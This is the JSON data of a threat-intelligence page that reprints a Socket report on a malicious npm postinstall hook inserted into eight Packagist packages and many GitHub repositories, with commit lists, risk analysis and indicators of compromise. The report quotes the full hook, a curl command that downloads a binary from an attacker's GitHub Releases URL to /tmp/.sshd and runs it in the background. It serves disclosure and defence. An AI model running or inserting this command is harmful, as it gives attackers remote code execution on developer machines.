[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGQBpG8PPd7kHKuT96tvDU9e4QzB7klr77Qvc99s0AVo":3},{"article":4,"iocs":56},{"id":5,"title":6,"slug":7,"summary":8,"ai_summary":9,"brief":10,"full_text":11,"url":12,"image_url":13,"published_at":14,"ingested_at":15,"relevance_score":16,"entities":17,"category_id":35,"category":36,"article_tags":40},"f1b72fff-ed9c-408d-b98e-4f021d170880","Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects","malicious-postinstall-hook-found-across-700-github-repositories-including-packag-4fdf9d","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages whose upstream repositories were modified to include the same malicious postinstall script. The script attempted to download a Linux binary from a GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, make it executable, and run it in the background. The affected packages were all Composer packages, but the malicious code was not added to composer.json. Instead, it was inserted into package.json, targeting projects that ship JavaScript build tooling alongside PHP code. That cross-ecosystem placement is notable because developers and security teams reviewing PHP dependencies may focus on Composer metadata while overlooking package.json lifecycle hooks bundled inside the package. Socket’s AI scanner detected the campaign across eight branch-tracking package versions: Package Affected Version moritz-sauer-13\u002Fsilverstripe-cms-theme dev-master crosiersource\u002Fcrosierlib-base dev-master devdojo\u002Fwave dev-main devdojo\u002Fgenesis dev-main katanaui\u002Fkatana dev-main elitedevsquad\u002Fsidecar-laravel 3.x-dev r2luna\u002Fbrain dev-main baskarcm\u002Ftzi-chat-ui dev-main Socket’s AI scanner flagged all eight affected package artifacts after identifying the same suspicious install-time behavior across the set. 
We identified multiple packages with a postinstall hook that downloads an external binary and immediately executes it, often placing the file at \u002Ftmp\u002F.sshd, with weakened TLS verification and background execution. Broader GitHub Search Shows Hundreds of References # During the course of this investigation, Socket found that the campaign was not limited to the initial Packagist packages flagged by the AI scanner. A GitHub code search for the attacker-controlled account parikhpreyash4 returned hundreds of public code results approximately 17 hours after the first detection, including many Node.js repositories. Socket has not yet confirmed how many of those results represent distinct compromises, forks, duplicate package artifacts, or cached references. However, the volume of results tied to the same attacker infrastructure suggests a broader campaign involving the same package.json postinstall payload. The confirmed Packagist findings remain the clearest evidence available so far: eight PHP packages contained the same install-time command that downloaded gvfsd-network from the attacker-controlled GitHub Releases URL, wrote it to \u002Ftmp\u002F.sshd, made it executable, and launched it in the background. Follow-up GitHub searches indicate the same infrastructure may have been reused across a much wider set of JavaScript projects. Identical Payload Delivery # The malicious postinstall script was identical across the confirmed package artifacts: curl -skL https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network -o \u002Ftmp\u002F.sshd 2>\u002Fdev\u002Fnull && chmod +x \u002Ftmp\u002F.sshd && \u002Ftmp\u002F.sshd & The command has several high-risk characteristics: It uses curl -k, disabling TLS certificate verification. It downloads a binary named gvfsd-network from GitHub Releases. It writes the binary to \u002Ftmp\u002F.sshd, a hidden filename that resembles an SSH daemon. 
It suppresses error output with 2>\u002Fdev\u002Fnull. It makes the file executable with chmod +x. It runs the binary in the background using &. Socket researchers were unable to retrieve the second-stage binary during follow-up because the GitHub-hosted payload was no longer available. However, the first-stage behavior is sufficient to classify the packages as malicious. The script downloads and executes an unauthenticated remote binary during installation with no integrity check, while suppressing errors and hiding the executable under a system-like filename. Malicious Commits in Upstream GitHub Repositories # moritz-sauer-13\u002Fsilverstripe-cms-theme Malicious commit: 7825479 Cleanup status: The hook was still present on master when checked. crosiersource\u002Fcrosierlib-base Malicious commit: 551c319 Cleanup status: The hook was still present on master when checked. thedevdojo\u002Fwave Malicious commit: 8f9127a Cleanup status: Reverted by 5afe6da. thedevdojo\u002Fgenesis Malicious commit: fe7b1cd Cleanup status: Reverted by 3be1f20. katanaui\u002Fkatana Malicious commit: a32f9e1 Cleanup status: Reverted by f679252. elitedevsquad\u002Fsidecar-laravel Malicious commit: ed6fd36 Cleanup status: Reverted by b1f5c53, titled security: revert malicious postinstall payload. r2luna\u002Fbrain Malicious commit: 85eca91 Cleanup status: Reverted by 421a1d5, titled security: revert malicious postinstall payload. baskarcm\u002Ftzi-chat-ui Malicious commit: 58fa0b2 Cleanup status: The hook was still present on main when checked. # The confirmed Packagist findings appear to stem from malicious commits made directly to upstream GitHub repositories. In each case, the attacker added the same package.json postinstall script to a repository that was tracked by Packagist. Once Packagist updated its branch-tracking package versions, those malicious repository states became infected package artifacts. The campaign was not necessarily aimed at Packagist itself. 
The attacker targeted source repositories, and Packagist reflected those changes through dev-main, dev-master, and 3.x-dev package versions. Several maintainers later reverted the malicious commits, which caused the current branch-tracking package views to move back to clean artifacts. The malicious code was placed in package.json, not composer.json, targeting repositories that included JavaScript build tooling alongside PHP code. In PHP projects, that placement can be easy to miss if defenders focus only on Composer metadata while overlooking JavaScript lifecycle scripts bundled in the same repository. Socket reported the affected packages to Packagist, which immediately removed them. Branch-Tracking Versions Complicate Response # Most affected versions were development branches, including dev-main, dev-master, and 3.x-dev. These are branch-tracking versions rather than immutable releases. This also affected remediation. Packagist temporarily deleted the affected package entries, but noted that branch-tracking packages could be restored on the next package update unless the upstream repository was fixed. For defenders, this means the affected version label alone is not enough. The relevant artifact should be tied to the observed commit or archive state when available. Potential for Execution # Two of the affected packages account for most of the practical risk. devdojo\u002Fwave is an open source Laravel SaaS starter kit with roughly 6,400 GitHub stars. devdojo\u002Fgenesis, from the same publisher, has about 1,300 stars and 9,100 Packagist installs. Its Packagist metadata describes it as a Laravel starter kit built with Tailwind CSS, Alpine.js, Laravel, Livewire, Folio, and Volt. Starter kits are the worst case for this attack pattern. The repository becomes the developer's project, so the malicious package.json lands at the project root, where npm install runs its postinstall script directly. 
For the other affected packages, which are libraries pulled into vendor\u002F, the postinstall hook does not fire from a top-level npm install, since npm only runs scripts for packages declared in the root project's dependencies. The remaining six affected Packagist packages appear to have much smaller adoption and more niche or personal use cases. That does not make the compromise benign, but it does concentrate the most likely real-world exposure in the starter kit projects. Recommendations # Teams using Packagist packages that include JavaScript build tooling should inspect bundled package.json files, not only composer.json. This is especially important for branch-tracking Composer dependencies, where the package contents can change as the upstream branch moves. Socket flagged the affected package artifacts as malicious based on their install-time behavior. The detected pattern matched a coordinated supply chain campaign: unrelated packages contained the same lifecycle hook, the same GitHub Releases payload URL, the same hidden local filename, and the same background execution chain. Even without the second-stage binary, the malicious installer is enough to warrant blocking. It provides remote code execution during installation or build workflows and attempts to hide its activity by disabling TLS verification, suppressing errors, and running a downloaded binary in the background. 
Indicators of Compromise # GitHub account: parikhpreyash4 GitHub repository: parikhpreyash4\u002Fsystemd-network-helper-aa5c751f Payload URL: https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network Payload File Path: \u002Ftmp\u002F.sshd Suspicious command fragments: curl -skL chmod +x \u002Ftmp\u002F.sshd \u002Ftmp\u002F.sshd &","Socket researchers identified a coordinated supply chain campaign affecting eight Composer packages on Packagist, where upstream repositories were modified to include malicious postinstall scripts in package.json files. The scripts attempted to download a Linux binary named gvfsd-network from an attacker-controlled GitHub Releases URL, save it to \u002Ftmp\u002F.sshd, and execute it in the background with disabled TLS verification. A broader GitHub search revealed hundreds of additional references to the same attacker infrastructure across Node.js repositories, suggesting the campaign extends far beyond the confirmed Packagist findings.","Malicious postinstall hooks discovered across 700+ GitHub repos targeting PHP and Node.js packages via Packagist.","Security NewsAI Has Taken Over Open SourceVibe coding at scale is reshaping how packages are created, contributed, and selected across the software supply chainBy André Staltz - May 22, 2026","https:\u002F\u002Fsocket.dev\u002Fblog\u002Fmalicious-postinstall-hook-found-across-700-github-repos?utm_medium=feed","https:\u002F\u002Fcdn.sanity.io\u002Fimages\u002Fcgdhsj6q\u002Fproduction\u002Fd66a69ec89dc89742b33b6b178982263b5f44386-1672x941.png?w=1000&q=95&fit=max&auto=format","2026-05-22T21:03:29.112+00:00","2026-05-22T22:00:21.049859+00:00",9,[18,21,24,27,29,32],{"name":19,"type":20},"parikhpreyash4","threat_actor",{"name":22,"type":23},"systemd-network-helper supply chain 
attack","campaign",{"name":25,"type":26},"devdojo\u002Fwave","product",{"name":28,"type":26},"devdojo\u002Fgenesis",{"name":30,"type":31},"npm postinstall hooks","technology",{"name":33,"type":34},"Packagist","vendor","26b0b636-0e31-4db1-bffb-61bdf9f20a58",{"id":35,"icon":37,"name":38,"slug":39},null,"Supply Chain","supply-chain",[41,46,51],{"category":42},{"id":43,"icon":37,"name":44,"slug":45},"89f78b1c-3503-45a1-9fc7-e23d2ce1c6d5","Malware","malware",{"category":47},{"id":48,"icon":37,"name":49,"slug":50},"ade75414-7914-4e23-a450-48b64546ee70","Open Source","open-source",{"category":52},{"id":53,"icon":37,"name":54,"slug":55},"e7b231c8-5f79-4465-8d38-1ef13aea5a14","Threat Intelligence","threat-intelligence",[57,61],{"type":58,"value":59,"context":60},"url","https:\u002F\u002Fgithub.com\u002Fparikhpreyash4\u002Fsystemd-network-helper-aa5c751f\u002Freleases\u002Flatest\u002Fdownload\u002Fgvfsd-network","Malicious binary download URL used in postinstall hook",{"type":45,"value":62,"context":63},"gvfsd-network","Second-stage malicious Linux binary downloaded and executed from \u002Ftmp\u002F.sshd"]